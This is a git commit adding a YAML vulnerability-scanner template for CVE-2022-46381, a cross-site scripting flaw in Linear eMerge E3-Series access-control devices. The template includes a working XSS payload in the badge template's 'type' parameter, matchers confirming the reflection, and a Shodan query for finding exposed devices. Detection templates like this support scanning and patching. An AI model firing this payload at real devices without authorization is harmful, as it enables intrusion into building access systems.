Merge pull request #6423 from arafatansari/patch-118

Create CVE-2022-46381.yaml
2022-12-27 21:26:39 +05:30 · 2022-12-27 21:26:39 +05:30 · afc1c5a58a
parent 3043ab0ca1 7d98a20915
commit afc1c5a58a
1 changed files with 32 additions and 0 deletions
--- a/cves/2022/CVE-2022-46381.yaml
+++ b/cves/2022/CVE-2022-46381.yaml
@ -0,0 +1,32 @@
+id: CVE-2022-46381
+
+info:
+  name: Certain Linear eMerge E3-Series - Cross Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381
+    - https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt
+  metadata:
+    verified: "true"
+    shodan-query: http.html:"Linear eMerge"
+  tags: cve,cve2022,xss,emerge,linear
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/badging/badge_template_v0.php?layout=1&type="/><svg/onload="alert(document.domain)"/>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<svg/onload="alert(document.domain)"/>'
+          - 'Badging Template'
+        condition: and
+
+      - type: status
+        status:
+          - 200